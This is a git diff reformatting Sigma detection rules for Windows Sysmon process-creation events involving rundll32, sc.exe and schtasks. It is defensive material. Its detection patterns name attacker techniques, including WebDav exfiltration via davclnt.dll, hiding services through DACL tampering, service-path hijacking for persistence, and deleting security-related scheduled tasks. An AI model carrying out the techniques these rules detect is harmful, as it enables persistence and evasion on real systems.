+19,21 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE filter_main_null: - CommandLine: null + CommandLine: filter_main_empty: - CommandLine: '' + CommandLine: '' filter_main_known_extension: - CommandLine|contains: + CommandLine|contains: - .cpl - .dll - '.inf' filter_main_localserver: - CommandLine|contains: ' -localserver ' + CommandLine|contains: ' -localserver ' filter_main_zzzzInvokeManagedCustomActionOutOfProc: - CommandLine|contains|all: + CommandLine|contains|all: - C:\Windows\Installer\MSI - .tmp - zzzzInvokeManagedCustomActionOutOfProc diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_user32_dll.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_user32_dll.yml index c1743f885..661b27c36 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_user32_dll.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_user32_dll.yml @@ -1,8 +1,7 @@ title: Suspicious Workstation Locking via Rundll32 id: 3b5b0213-0460-4e3f-8937-3abf98ff7dcc status: test -description: Detects a suspicious call to the user32.dll function that locks the user - workstation +description: Detects a suspicious call to the user32.dll function that locks the user workstation references: - https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/ author: frack113 @@ -19,20 +18,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_call_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_call_parent: ParentImage|endswith: \cmd.exe selection_call_cli: - CommandLine|contains: user32.dll, + CommandLine|contains: user32.dll, selection_function: - CommandLine|contains: LockWorkStation + CommandLine|contains: LockWorkStation condition: process_creation and (all of selection_*) fields: - Image - ParentImage falsepositives: - - Scripts or links on the user desktop used to lock the workstation instead of - Windows+L or the menu option + - Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml index 8829de915..f847ab950 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml @@ -1,13 +1,9 @@ title: WebDav Client Execution Via Rundll32.EXE id: 2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5 status: test -description: 'Detects "svchost.exe" spawning "rundll32.exe" with command arguments - like "C:\windows\system32\davclnt.dll,DavSetCookie". - - This could be an indicator of exfiltration or use of WebDav to launch code (hosted - on a WebDav server). - - ' +description: | + Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". + This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server). references: - https://github.com/OTRF/detection-hackathon-apt29/issues/17 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.md @@ -28,10 +24,10 @@ detection: selection_parent: ParentImage|endswith: \svchost.exe selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains: C:\windows\system32\davclnt.dll,DavSetCookie + CommandLine|contains: C:\windows\system32\davclnt.dll,DavSetCookie condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml index 843fd2bb7..de81ecdc3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml @@ -1,12 +1,8 @@ title: Suspicious WebDav Client Execution Via Rundll32.EXE id: 982e9f2d-1a85-4d5b-aea4-31f5e97c6555 status: experimental -description: 'Detects "svchost.exe" spawning "rundll32.exe" with command arguments - like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator - of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially - a sign of exploitation of CVE-2023-23397 - - ' +description: | + Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397 references: - https://twitter.com/aceresponder/status/1636116096506818562 - https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/ @@ -32,13 +28,13 @@ detection: ParentImage|endswith: \svchost.exe ParentCommandLine|contains: -s WebClient Image|endswith: \rundll32.exe - CommandLine|contains: C:\windows\system32\davclnt.dll,DavSetCookie - CommandLine|re: ://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} + CommandLine|contains: C:\windows\system32\davclnt.dll,DavSetCookie + CommandLine|re: ://\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} filter_local_ips: - CommandLine|contains: - - ://10. - - ://192.168. - - ://172.16. + CommandLine|contains: + - ://10. # 10.0.0.0/8 + - ://192.168. # 192.168.0.0/16 + - ://172.16. # 172.16.0.0/12 - ://172.17. - ://172.18. - ://172.19. @@ -54,8 +50,8 @@ detection: - ://172.29. - ://172.30. - ://172.31. - - ://127. - - ://169.254. + - ://127. # 127.0.0.0/8 + - ://169.254. # 169.254.0.0/16 condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_without_parameters.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_without_parameters.yml index 4dc27c7fa..3824f784f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_without_parameters.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_without_parameters.yml @@ -1,8 +1,7 @@ title: Rundll32 Execution Without Parameters id: 5bb68627-3198-40ca-b458-49f973db8752 status: test -description: Detects rundll32 execution without parameters as observed when running - Metasploit windows/smb/psexec exploit module +description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module references: - https://bczyz1.github.io/2021/01/30/psexec.html author: Bartlomiej Czyz, Relativity @@ -23,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine: + CommandLine: - rundll32.exe - rundll32 condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_runonce_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_runonce_execution.yml index bda329fbb..454a7cab6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_runonce_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_runonce_execution.yml @@ -1,8 +1,7 @@ title: Run Once Task Execution as Configured in Registry id: 198effb6-6c98-4d0c-9ea3-451fa143c45c status: test -description: This rule detects the execution of Run Once task as configured in the - registry +description: This rule detects the execution of Run Once task as configured in the registry references: - https://twitter.com/pabraeken/status/990717080805789697 - https://lolbas-project.github.io/lolbas/Binaries/Runonce/ @@ -22,11 +21,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \runonce.exe - - Description: Run Once Wrapper + - Image|endswith: \runonce.exe + - Description: Run Once Wrapper selection_cli: - - CommandLine|contains: /AlternateShellStartup - - CommandLine|endswith: /r + - CommandLine|contains: /AlternateShellStartup + - CommandLine|endswith: /r condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml index 23318908c..89d9113c9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml @@ -1,8 +1,7 @@ title: Possible Privilege Escalation via Weak Service Permissions id: d937b75f-a665-4480-88a5-2f20e9f9b22a status: test -description: Detection of sc.exe utility spawning by user with Medium integrity level - to change service ImagePath or FailureCommand +description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment - https://pentestlab.blog/2017/03/30/weak-service-permissions/ @@ -26,11 +25,11 @@ detection: Image|endswith: \sc.exe IntegrityLevel: Medium selection_binpath: - CommandLine|contains|all: + CommandLine|contains|all: - config - binPath selection_failure: - CommandLine|contains|all: + CommandLine|contains|all: - failure - command condition: process_creation and (scbynonadmin and 1 of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_create_service.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_create_service.yml index 3cc3c0d0d..07169583e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_create_service.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_create_service.yml @@ -1,8 +1,8 @@ title: New Service Creation Using Sc.EXE id: 85ff530b-261d-48c6-a441-facaa2e81e48 related: - - id: c02e96b7-c63a-4c47-bd83-4a9f74afcfb2 - type: similar + - id: c02e96b7-c63a-4c47-bd83-4a9f74afcfb2 # Using PowerShell + type: similar status: test description: Detects the creation of a new service using the "sc.exe" utility. references: @@ -23,7 +23,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \sc.exe - CommandLine|contains|all: + CommandLine|contains|all: - create - binPath condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_disable_service.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_disable_service.yml index a228f10a7..5b5ed0407 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_disable_service.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_disable_service.yml @@ -1,8 +1,7 @@ title: Service StartupType Change Via Sc.EXE id: 85c312b7-f44d-4a51-a024-d671c40b49fc status: test -description: Detect the use of "sc.exe" to change the startup type of a service to - "disabled" or "demand" +description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand" references: - https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 author: Nasreddine Bencherchali (Nextron Systems) @@ -21,13 +20,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \sc.exe - - OriginalFileName: sc.exe + - Image|endswith: \sc.exe + - OriginalFileName: sc.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' config ' - start - CommandLine|contains: + CommandLine|contains: - disabled - demand condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_new_kernel_driver.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_new_kernel_driver.yml index ddc55e6ba..df4f4d0ca 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_new_kernel_driver.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_new_kernel_driver.yml @@ -21,10 +21,10 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \sc.exe - CommandLine|contains: + CommandLine|contains: - create - config - CommandLine|contains|all: + CommandLine|contains|all: - binPath - type - kernel diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_query.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_query.yml index d97214d56..085c20532 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_query.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_query.yml @@ -1,8 +1,7 @@ title: SC.EXE Query Execution id: 57712d7a-679c-4a41-a913-87e7175ae429 status: test -description: Detects execution of "sc.exe" to query information about registered services - on the system +description: Detects execution of "sc.exe" to query information about registered services on the system references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-1---system-service-discovery author: frack113 @@ -23,12 +22,10 @@ detection: Image|endswith: \sc.exe OriginalFileName|endswith: sc.exe selection_cli: - CommandLine|contains: ' query' + CommandLine|contains: ' query' condition: process_creation and (all of selection_*) falsepositives: - - Legitimate query of a service by an administrator to get more information such - as the state or PID - - Keybase process "kbfsdokan.exe" query the dokan1 service with the following - commandline "sc query dokan1" + - Legitimate query of a service by an administrator to get more information such as the state or PID + - Keybase process "kbfsdokan.exe" query the dokan1 service with the following commandline "sc query dokan1" level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml index faa5b1954..2f5d4162e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml @@ -1,12 +1,10 @@ title: Allow Service Access Using Security Descriptor Tampering Via Sc.EXE id: 6c8fbee5-dee8-49bc-851d-c3142d02aa47 related: - - id: a537cfc3-4297-4789-92b5-345bfd845ad0 - type: similar + - id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Generic SD tampering + type: similar status: test -description: Detects suspicious DACL modifications to allow access to a service from - a suspicious trustee. This can be used to override access restrictions set by - previous ACLs. +description: Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs. references: - https://twitter.com/0gtweet/status/1628720819537936386 - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/ @@ -25,19 +23,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_sc: - - Image|endswith: \sc.exe - - OriginalFileName: sc.exe + - Image|endswith: \sc.exe + - OriginalFileName: sc.exe selection_sdset: - CommandLine|contains|all: + CommandLine|contains|all: - sdset - - A; + - A; # Allow Access selection_trustee: - CommandLine|contains: - - ;IU - - ;SU - - ;BA - - ;SY - - ;WD + CommandLine|contains: + - ;IU # Interactively logged-on user + - ;SU # Service logon user + - ;BA # Built-in administrators + - ;SY # Local system + - ;WD # Everyone condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml index 870e75c63..d54b5fc41 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml @@ -1,13 +1,12 @@ title: Deny Service Access Using Security Descriptor Tampering Via Sc.EXE id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 related: - - id: 98c5aeef-32d5-492f-b174-64a691896d25 - type: similar - - id: a537cfc3-4297-4789-92b5-345bfd845ad0 - type: similar + - id: 98c5aeef-32d5-492f-b174-64a691896d25 # Generic SD tampering + type: similar + - id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Specific Technique + type: similar status: test -description: Detects suspicious DACL modifications to deny access to a service that - affects critical trustees. This can be used to hide services or make them unstoppable. +description: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable. references: - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/ - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/ @@ -27,19 +26,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_sc: - - Image|endswith: \sc.exe - - OriginalFileName: sc.exe + - Image|endswith: \sc.exe + - OriginalFileName: sc.exe selection_sdset: - CommandLine|contains|all: + CommandLine|contains|all: - sdset - - D; + - D; # Deny Access selection_trustee: - CommandLine|contains: - - ;IU - - ;SU - - ;BA - - ;SY - - ;WD + CommandLine|contains: + - ;IU # Interactively logged-on user + - ;SU # Service logon user + - ;BA # Built-in administrators + - ;SY # Local system + - ;WD # Everyone condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml index 06a6db993..3357fff9e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml @@ -1,13 +1,12 @@ title: Service DACL Abuse To Hide Services Via Sc.EXE id: a537cfc3-4297-4789-92b5-345bfd845ad0 related: - - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 - type: similar - - id: 98c5aeef-32d5-492f-b174-64a691896d25 - type: similar + - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 # Deny Service Access + type: similar + - id: 98c5aeef-32d5-492f-b174-64a691896d25 # Generic SD tampering + type: similar status: test -description: Detects usage of the "sc.exe" utility adding a new service with special - permission seen used by threat actors which makes the service hidden and unremovable. +description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable. references: - https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/ @@ -30,11 +29,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \sc.exe - - OriginalFileName: sc.exe + - Image|endswith: \sc.exe + - OriginalFileName: sc.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - sdset + # Summary of permissions + # DC: Delete All Child Objects + # LC: List Contents + # WP: Write All Properties + # DT: Delete Subtree + # SD: Delete - DCLCWPDTSD condition: process_creation and (all of selection_*) falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_modification.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_modification.yml index 4b743ff7f..b9e32768d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_modification.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_sdset_modification.yml @@ -1,13 +1,12 @@ title: Service Security Descriptor Tampering Via Sc.EXE id: 98c5aeef-32d5-492f-b174-64a691896d25 related: - - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 - type: similar - - id: a537cfc3-4297-4789-92b5-345bfd845ad0 - type: similar + - id: 99cf1e02-00fb-4c0d-8375-563f978dfd37 # Deny Service Access + type: similar + - id: a537cfc3-4297-4789-92b5-345bfd845ad0 # Specific Technique + type: similar status: test -description: Detection of sc.exe utility adding a new service with special permission - which hides that service. +description: Detection of sc.exe utility adding a new service with special permission which hides that service. references: - https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html - https://www.sans.org/blog/red-team-tactics-hiding-windows-services/ @@ -30,10 +29,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \sc.exe - - OriginalFileName: sc.exe + - Image|endswith: \sc.exe + - OriginalFileName: sc.exe selection_cli: - CommandLine|contains: sdset + CommandLine|contains: sdset condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_service_path_modification.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_service_path_modification.yml index cd7155f26..dd65e0d16 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_service_path_modification.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_service_path_modification.yml @@ -1,8 +1,7 @@ title: Suspicious Service Path Modification id: 138d3531-8793-4f50-a2cd-f291b2863d78 status: test -description: Detects service path modification via the "sc" binary to a suspicious - command or path +description: Detects service path modification via the "sc" binary to a suspicious command or path references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html @@ -23,10 +22,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \sc.exe - CommandLine|contains|all: + CommandLine|contains|all: - config - binPath - CommandLine|contains: + CommandLine|contains: + # Add more suspicious commands or binaries - powershell - 'cmd ' - mshta @@ -41,6 +41,7 @@ detection: - cmd /c - cmd /k - cmd /r + # Add more suspicious paths - C:\Users\Public - \Downloads\ - \Desktop\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml index a3c07991f..96e734150 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml @@ -1,9 +1,7 @@ title: Potential Persistence Attempt Via Existing Service Tampering id: 38879043-7e1e-47a9-8d46-6bec88e201df status: test -description: Detects the modification of an existing service in order to execute an - arbitrary payload when the service is started or killed as a potential method - for persistence. +description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence. references: - https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/ author: Sreeman @@ -22,25 +20,25 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_sc: - - CommandLine|contains|all: - - 'sc ' - - 'config ' - - binpath= - - CommandLine|contains|all: - - 'sc ' - - failure - - command= + - CommandLine|contains|all: + - 'sc ' + - 'config ' + - binpath= + - CommandLine|contains|all: + - 'sc ' + - failure + - command= selection_reg_img: - - CommandLine|contains|all: - - 'reg ' - - 'add ' - - FailureCommand - - CommandLine|contains|all: - - 'reg ' - - 'add ' - - ImagePath + - CommandLine|contains|all: + - 'reg ' + - 'add ' + - FailureCommand + - CommandLine|contains|all: + - 'reg ' + - 'add ' + - ImagePath selection_reg_ext: - CommandLine|contains: + CommandLine|contains: - .sh - .exe - .dll diff --git a/sigma/sysmon/process_creation/proc_creation_win_sc_stop_service.yml b/sigma/sysmon/process_creation/proc_creation_win_sc_stop_service.yml index 4755908cf..afcdf3c4e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sc_stop_service.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sc_stop_service.yml @@ -1,8 +1,8 @@ title: Stop Windows Service Via Sc.EXE id: 81bcb81b-5b1f-474b-b373-52c871aaa7b1 related: - - id: eb87818d-db5d-49cc-a987-d5da331fbd90 - type: obsoletes + - id: eb87818d-db5d-49cc-a987-d5da331fbd90 + type: obsoletes status: test description: Detects the stopping of a Windows service author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) @@ -19,20 +19,19 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: sc.exe - - Image|endswith: \sc.exe + - OriginalFileName: sc.exe + - Image|endswith: \sc.exe selection_cli: - CommandLine|contains: ' stop ' + CommandLine|contains: ' stop ' filter_kaspersky: - CommandLine: - - sc stop KSCWebConsoleMessageQueue - - sc stop LGHUBUpdaterService - User|contains: + CommandLine: + - sc stop KSCWebConsoleMessageQueue # kaspersky Security Center Web Console double space between sc and stop + - sc stop LGHUBUpdaterService # Logitech LGHUB Updater Service + User|contains: # covers many language settings - AUTHORI - AUTORI condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - There are many legitimate reasons to stop a service. This rule isn't looking - for any suspicious behaviour in particular. Filter legitimate activity accordingly + - There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_appdata_local_system.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_appdata_local_system.yml index 0acc4c6ac..e23e2bddc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_appdata_local_system.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_appdata_local_system.yml @@ -22,21 +22,22 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \schtasks.exe - CommandLine|contains|all: + CommandLine|contains|all: - /Create - /RU - /TR - C:\Users\ - \AppData\Local\ - CommandLine|contains: - - NT AUT - - ' SYSTEM ' + CommandLine|contains: + - NT AUT # This covers the usual NT AUTHORITY\SYSTEM + - ' SYSTEM ' # SYSTEM is a valid value for schtasks hence it gets it's own value with space filter: + # FP from test set in SIGMA ParentImage|contains|all: - \AppData\Local\Temp\ - TeamViewer_.exe Image|endswith: \schtasks.exe - CommandLine|contains: /TN TVInstallRestore + CommandLine|contains: /TN TVInstallRestore condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_change.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_change.yml index 15796dc0e..5faaee6d7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_change.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_change.yml @@ -1,18 +1,13 @@ title: Suspicious Modification Of Scheduled Tasks id: 1c0e41cd-21bb-4433-9acc-4a2cd6367b9b related: - - id: 614cf376-6651-47c4-9dcc-6b9527f749f4 - type: similar + - id: 614cf376-6651-47c4-9dcc-6b9527f749f4 # Security-Audting Eventlog + type: similar status: test -description: 'Detects when an attacker tries to modify an already existing scheduled - tasks to run from a suspicious location - - Attackers can create a simple looking task in order to avoid detection on creation - as it''s often the most focused on - +description: | + Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location + Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on Instead they modify the task after creation to include their malicious payload - - ' references: - Internal Research - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks @@ -32,11 +27,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_schtasks: Image|endswith: \schtasks.exe - CommandLine|contains|all: + CommandLine|contains|all: - ' /Change ' - ' /TN ' selection_susp_locations: - CommandLine|contains: + CommandLine|contains: - \AppData\Local\Temp - \AppData\Roaming\ - \Users\Public\ @@ -51,7 +46,7 @@ detection: - '%comspec%' - '%localappdata%' selection_susp_images: - CommandLine|contains: + CommandLine|contains: - regsvr32 - rundll32 - 'cmd /c ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_creation.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_creation.yml index 591ae494f..d4c6442d4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_creation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_creation.yml @@ -23,9 +23,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \schtasks.exe - CommandLine|contains: ' /create ' + CommandLine|contains: ' /create ' filter: - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI condition: process_creation and (selection and not filter) diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml index c305cd804..a211872cc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml @@ -1,8 +1,7 @@ title: Suspicious Scheduled Task Creation Involving Temp Folder id: 39019a4e-317f-4ce3-ae63-309a8c6b53c5 status: test -description: Detects the creation of scheduled tasks that involves a temporary folder - and runs only once +description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once references: - https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3 author: Florian Roth (Nextron Systems) @@ -22,7 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \schtasks.exe - CommandLine|contains|all: + CommandLine|contains|all: - ' /create ' - ' /sc once ' - \Temp\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_delete.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_delete.yml index 45709baff..267728c02 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_delete.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_schtasks_delete.yml @@ -1,13 +1,12 @@ title: Delete Important Scheduled Task id: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78 related: - - id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d - type: similar - - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad - type: similar + - id: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d # TaskScheduler EventLog + type: similar + - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad # Security-Audting Eventlog + type: similar status: test -description: Detects when adversaries stop services or processes by deleting their - respective scheduled tasks in order to conduct data destructive activities +description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities references: - Internal Research author: Nasreddine Bencherchali (Nextron Systems) @@ -25,10 +24,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational schtasks_exe: Image|endswith: \schtasks.exe - CommandLine|contains|all: + CommandLine|contains|all: - /delete - /tn - CommandLine|contains: + CommandLine|contains: + # Add more important tasks - \Windows\SystemRestore\SR - \Windows\Windows Defender\ - \Windows\BitLocker diff --git a/sigma/sysmon/process_creation/proc_creation_win_schtasks_delete_all.yml b/sigma/sysmon/process_creation/proc_creation_win_schtasks_delete_all.yml index c1078dcd5..d4fc6f279 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_schtasks_delete_all.yml +++ 